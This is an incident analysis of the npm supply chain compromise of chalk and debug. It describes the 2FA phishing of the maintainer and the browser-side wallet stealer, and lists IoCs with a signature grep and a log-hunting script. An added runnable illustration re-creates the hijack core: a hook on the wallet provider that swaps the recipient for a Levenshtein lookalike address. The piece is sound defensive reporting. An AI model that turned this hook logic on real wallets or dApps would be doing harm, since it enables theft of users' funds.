Largest NPM Supply Chain Attack Ever Steals Only 5 Cents—Millions Lost in Cleanup

Source: Largest NPM Supply Chain Attack Steals a Few Cents


An attacker hijacked the npm account of the maintainer qix, who publishes widely used packages such as chalk and debug (the debug-js project). Together these packages are downloaded more than 2 billion times a week, which makes this the largest npm supply chain compromise by reach recorded to date.


How the Breach Happened

  • The attacker phished the package author with an email from support@npmjs[.]help, a lookalike of the legitimate npmjs.com domain. The domain is now offline and originally resolved to 185.7.81.108.
  • The email directed the author to a fake page that mimicked npm's two-factor authentication (2FA) settings page.
  • That page loaded credential-stealing scripts from attacker-controlled BunnyCDN buckets (static-mw-host.b-cdn[.]net, img-data-backup.b-cdn[.]net).
  • The captured username, password and one-time 2FA code were relayed to a server at websocket-api2.publicvm[.]com, letting the attacker log in while the short-lived code was still valid and publish new versions of the packages.

Malware Behavior

Rather than a host-level payload, the attacker published new versions of the packages with a browser-side crypto wallet stealer (a transaction hijacker) appended:

  • Runs only in a browser context: no desktop infection, persistence or file access.
  • Hooks the injected wallet provider's request, send and sendAsync methods (the window.ethereum interface) and overrides the page's fetch and XMLHttpRequest, so it sees both wallet calls and ordinary API traffic.
  • For Ethereum calls such as approve, transfer and permit, it rewrites the recipient (or spender) address to the attacker's wallet 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976.
  • For Solana transactions it replaces the recipient and key fields with invalid addresses, so the transaction fails rather than being redirected.
  • It also intercepts JSON responses and replaces any crypto address it finds with the closest of about 280 hardcoded attacker addresses, chosen by Levenshtein distance so that the substitute resembles the original at a glance.
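The following is an added illustration, not the malware's own code: a minimal model of the two mechanisms described above (a wrapper around the injected provider's request method, and a Levenshtein search over a hardcoded address pool) to make the failure mode concrete. The addresses, the pool and the stand-in provider are constructed for this example; the real payload also hooks send, sendAsync, fetch and XMLHttpRequest, which this model omits.

```javascript
// Added illustration, not code from the compromised packages.
// Models the provider hook and the Levenshtein lookalike selection described
// above, with a constructed address pool and a fake window.ethereum.

const ZERO28 = "0".repeat(28);
// Constructed addresses (40 hex chars after 0x); none is a real wallet.
const INTENDED = "0x1234abcd" + ZERO28 + "5678";                 // what the user meant
const LOOKALIKE = "0x1234abcd" + "0".repeat(27) + "1" + "5678";   // one character off
const UNRELATED = "0x" + "deadbeefcafebabe".repeat(2) + "deadbeef";
const ATTACKER_POOL = [UNRELATED, LOOKALIKE];                     // stands in for the ~280 hardcoded ones

// Standard Levenshtein edit distance (single-row dynamic programme).
function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Pick the pool entry that is visually closest to the address the user meant.
function pickLookalike(target, pool) {
  let best = pool[0];
  let bestDist = Infinity;
  for (const candidate of pool) {
    const d = levenshtein(target.toLowerCase(), candidate.toLowerCase());
    if (d < bestDist) { bestDist = d; best = candidate; }
  }
  return best;
}

// Wrap provider.request so the `to` of eth_sendTransaction is swapped.
// Real providers return a Promise; the wrapper forwards whatever the original
// returns, so it also works with the synchronous fake below.
function hookProvider(provider, pool) {
  const original = provider.request.bind(provider);
  provider.request = function (args) {
    const tx = args && Array.isArray(args.params) ? args.params[0] : undefined;
    if (args && args.method === "eth_sendTransaction" && tx && typeof tx.to === "string") {
      const swapped = { ...tx, to: pickLookalike(tx.to, pool) };
      return original({ ...args, params: [swapped, ...args.params.slice(1)] });
    }
    return original(args);
  };
  return provider;
}

// Constructed stand-in for window.ethereum: records what it would broadcast.
function makeFakeProvider() {
  return {
    sent: [],
    request(args) { this.sent.push(args); return "0xfakehash"; },
  };
}

// The check people usually do (start and end of the string) versus the one
// that catches the swap (full, case-insensitive comparison).
function looksRightAtAGlance(shown, intended) {
  const s = shown.toLowerCase(), i = intended.toLowerCase();
  return s.slice(0, 6) === i.slice(0, 6) && s.slice(-4) === i.slice(-4);
}
function exactMatch(shown, intended) {
  return shown.toLowerCase() === intended.toLowerCase();
}

// Demo: the dApp asks the wallet to pay INTENDED; what gets sent differs.
function demo() {
  const provider = hookProvider(makeFakeProvider(), ATTACKER_POOL);
  provider.request({
    method: "eth_sendTransaction",
    params: [{ from: "0x" + "1".repeat(40), to: INTENDED, value: "0x1" }],
  });
  const sentTo = provider.sent[0].params[0].to;
  return { sentTo, glance: looksRightAtAGlance(sentTo, INTENDED), exact: exactMatch(sentTo, INTENDED) };
}

if (typeof require !== "undefined" && require.main === module) console.log(demo());
```

The point of the demo is the last two fields: the substituted address passes a first-six, last-four glance and fails only a full comparison, which is why the advice below to verify the whole address matters.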

Note: The injected code assumed browser globals and did no runtime environment checks, so it threw errors in some Node-based CI/CD pipelines; those failures were how a number of users first noticed the compromise.


Impact

Surprisingly, the amount actually stolen was only about 5 cents in ETH and $20 in a memecoin, despite the enormous reach of the attack. The direct financial damage is negligible next to the indirect cost: thousands of developer hours to audit and clean affected environments, plus contractor costs for remediation.


What Maintainers and Users Should Do

  • Maintainers and consumers should scan working trees, build caches and published bundles for the malware signature, for example with:
    • grep -R 'checkethereumw' node_modules
    • the scanning tools published by security researchers phxgg and AndrewMohawk
  • Users must verify the full recipient address, not just its first and last characters, before approving any wallet operation; the substitute addresses are chosen to look alike.

Indicators of Compromise (IoCs)

  • Malicious domains:
    • npmjs[.]help
    • static-mw-host.b-cdn[.]net
    • img-data-backup.b-cdn[.]net
    • websocket-api2.publicvm[.]com
  • Attacker IP: 185.7.81.108
  • Attacker Ethereum address: 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976
  • Numerous addresses and wallet identifiers hardcoded in malware
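Added example (not from the original page): hunting for the network indicators above in outbound connection records. The domains are written with real dots here rather than the defanged [.] form used in the list. The log lines are constructed for this example and the line format (timestamp, client, destination host or IP with optional port) is an assumption; adapt the parser to your proxy or DNS logs. Note the deliberate lookalike handling: registry.npmjs.org is legitimate and must not match, while any subdomain of npmjs.help must.

```javascript
// Added example, not code from the original page.
// Match outbound destinations against the IoCs listed above.
const IOC_DOMAINS = [
  "npmjs.help",
  "static-mw-host.b-cdn.net",
  "img-data-backup.b-cdn.net",
  "websocket-api2.publicvm.com",
];
const IOC_IPS = ["185.7.81.108"];

// Return the matching indicator for a host, or null. A domain indicator matches
// itself and any subdomain, never a host that merely contains it as a prefix.
function matchesIoc(host) {
  const h = String(host).toLowerCase().replace(/\.$/, "");
  if (IOC_IPS.includes(h)) return h;
  return IOC_DOMAINS.find((d) => h === d || h.endsWith("." + d)) || null;
}

// Assumed line format: "<ISO time> <client> -> <host>[:port] <rest>"
const LINE_RE = /^(\S+)\s+(\S+)\s+->\s+([^\s:]+)(?::\d+)?\s*(.*)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  return m ? { ts: m[1], src: m[2], dst: m[3], rest: m[4] } : null;
}

// Walk the lines and return every record whose destination is an IoC.
function huntLog(lines) {
  const hits = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const ioc = matchesIoc(rec.dst);
    if (ioc) hits.push({ ts: rec.ts, src: rec.src, dst: rec.dst, ioc });
  }
  return hits;
}

// Constructed sample proxy log for the demo.
const SAMPLE_LOG = [
  "2025-09-08T12:01:02Z 10.0.0.5 -> registry.npmjs.org:443 CONNECT",
  "2025-09-08T12:01:09Z 10.0.0.5 -> www.npmjs.help:443 CONNECT",
  "2025-09-08T12:01:10Z 10.0.0.5 -> 185.7.81.108:443 CONNECT",
  "2025-09-08T12:02:30Z 10.0.0.7 -> static-mw-host.b-cdn.net:443 CONNECT",
  "2025-09-08T12:03:00Z 10.0.0.9 -> cdn.example.com:443 CONNECT",
  "malformed line that the parser should skip",
];

if (typeof require !== "undefined" && require.main === module) console.table(huntLog(SAMPLE_LOG));
```

Because the phishing domain is already offline, the value of this check is in historical logs: a hit from a developer workstation around the time of the phishing campaign is a strong signal that credentials on that machine were entered into the fake page.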

This incident underscores the need for vigilance over third-party dependencies and for developer security training against phishing. Because one-time 2FA codes were captured and replayed here, phishing-resistant second factors (FIDO2/WebAuthn security keys or passkeys, which npm supports) are the more robust defence for maintainer accounts than code-based 2FA.